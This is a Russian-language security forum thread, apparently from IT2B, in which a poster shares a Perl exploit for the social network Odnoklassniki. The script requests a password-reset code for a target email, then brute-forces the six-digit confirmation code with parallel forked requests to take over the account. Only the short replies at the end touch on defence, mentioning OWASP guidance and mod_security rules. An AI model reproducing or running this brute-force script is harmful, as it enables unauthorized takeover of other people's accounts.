Перейти к содержанию
View in the app

A better way to browse. Learn more.

IT2B - Технологии разведки для бизнеса

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Эксплоит для "одноклассников"

Featured Replies

Опубликовано
Раздача сплоита для "одноклассников" будет на irc канале #rst сети dalnet.ru в 15-00 по Москве. Кто опоздает - смотрите позже на сайтах тех, кто успел =).

P.S. Это не я, точно! :о))

  • Ответов 11
  • Просмотры 4,7т
  • Создана
  • Последний ответ

Топ авторов темы

Популярные дни

Опубликовано
  • Автор
#!/usr/bin/perl
use LWP::UserAgent;

print qq(
   ,__                    __,                       
   \\ \\                    / /                     
    \\ \\     __      _    / /                      
       \\  .___/\\:::* /\\ /                         
          |_____\\  |/  \\                         
         /<>//,./      /       _________                             
        /      /      /  \\    |  RST                 
       /      /.,\\\\<>/\\   \\   |   GHC                       
       \\      \\    /'  \\  /   |    UKT
        \\      \\  /     \\     |__\\xD____                         
         \\      \\/      /                           
       /  '''\\'''      /                               
    / /       \\   \\   / \\ \\                         
   / /         ___ \\ /   \\ \\                       
   *__                    __*
               [preved odnoklassne4gi]
                 
);



if (!scalar(@ARGV)) {
    print "\[~\]Usage : ./$0 eMail {number of child procs}\n\n";
    exit();
}
if (-e "success") {
    print "\[-\] File \"success\" exists in your directory. Please rename it or remove.\n\n";
    exit();    
}

my $email="$ARGV[0]";

if ($ARGV[1]) {
    my $MAX_PROCESSES=$ARGV[1];
} else {
    my $MAX_PROCESSES=5;
}
my $DEBUG=0;

my @pids;
my $npids=0;
my $restore=0;
my $e;

# first step - omg! I lost my password?!?!?!
$ua=LWP::UserAgent->new();
$page=$ua->post("http://odnoklassniki.ru/cdk/st.cmd/password/tkn/6544",["st.email"=>$email,"st.posted"=>"set"]);
$page_content=$page->content();
if ($page_content=~/st.email/) {
    print "\[-\] Please provide correct email address\n";
    exit();
} else {
    print "\[+\] Repair password code send to $email\n";
}

# step number two - bruteforce code for repair password
print "\[~\] Brutforce code for repair password\
This process make take max ~ 18 hours to check all combinations\
You need good internet channel and fast cpu\n";
open(LOG_FILE,">>log");
$not=1;
for ($code=100000;$code<=999999;$code++) {
    if (-e "success") {
        print "DONE";
        exit();
    }
    if ($code==199999 && $not==1) {
        $cod="099999";
        $not=0;
        $code=100000;
    } elsif ($code=~/^1(\d+)$/ && $not==1) {
        $code=~/^1(\d+)$/;
        $cod="0$1";
    } else {
        $cod=$code;
    }
    if ($cod=~/^(\d+)000$/) {
        print "#";
    }

    my $pid;
    $pid=fork();
    if($pid>0){
     push(@pids,$pid);
     $npids++;
     if($npids>=$MAX_PROCESSES){
         for(1..($MAX_PROCESSES)){
          $wait_ret=wait();
          if($wait_ret>0){
                    $npids--;
                }
            }
        }
        next;
    }elsif(undef $pid){
        print "fork error\n" if ($DEBUG);
        exit(0);
    }
    $p=$ua->post("http://www.odnoklassniki.ru/dk",["st.cmd"=>"passwordReset","st.email"=>$email,"st.confirmation-code"=>$cod,"st.posted"=>"set"]);
    $con=$p->content();
    if ($con=~/password.confirmation/) {
        print "$cod cached\n";
        print LOG_FILE "$cod cached\n";
        open(SUCCESS,">>success");
        print SUCCESS "\n############################\n";
        print SUCCESS "Yahooo! Congratulations! Code for password repair is - $cod\n";
        print SUCCESS "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
        print SUCCESS "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
        print SUCCESS "############################\n";
        print "############################\n";
        print "Yahooo! Congratulations! Code for password repair is - $cod\n";
        print "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
        print "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
        print "############################\n";
        close(SUCCESS);
    } else {
        print LOG_FILE "$cod failed\n";
    }
    exit();
}
close(LOG_FILE);

Опубликовано

Уважаемый Loo, для отстающих расскажите - о чем речь-то? :smile2:

Опубликовано
Уважаемый Loo, для отстающих расскажите - о чем речь-то? :smile2:

 

*шопотом* Уважаемый vbl, судя по тому, что мистер Лу, стал оправдываться заблаговременно, да еще так яро, он чего-то сотворил с Одноклассиками, и теперь обеспечивает себе алиби ))

Опубликовано

Мндя. :smile13: Видно, что программисты не читали руководства OWASP... :smile2:

 

Защититься от этого проще простого всего лишь с помощью нескольких правил mod_security :smile1:

 

 

Для публикации сообщений создайте учётную запись или авторизуйтесь

Account

Navigation

Поиск

Поиск

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.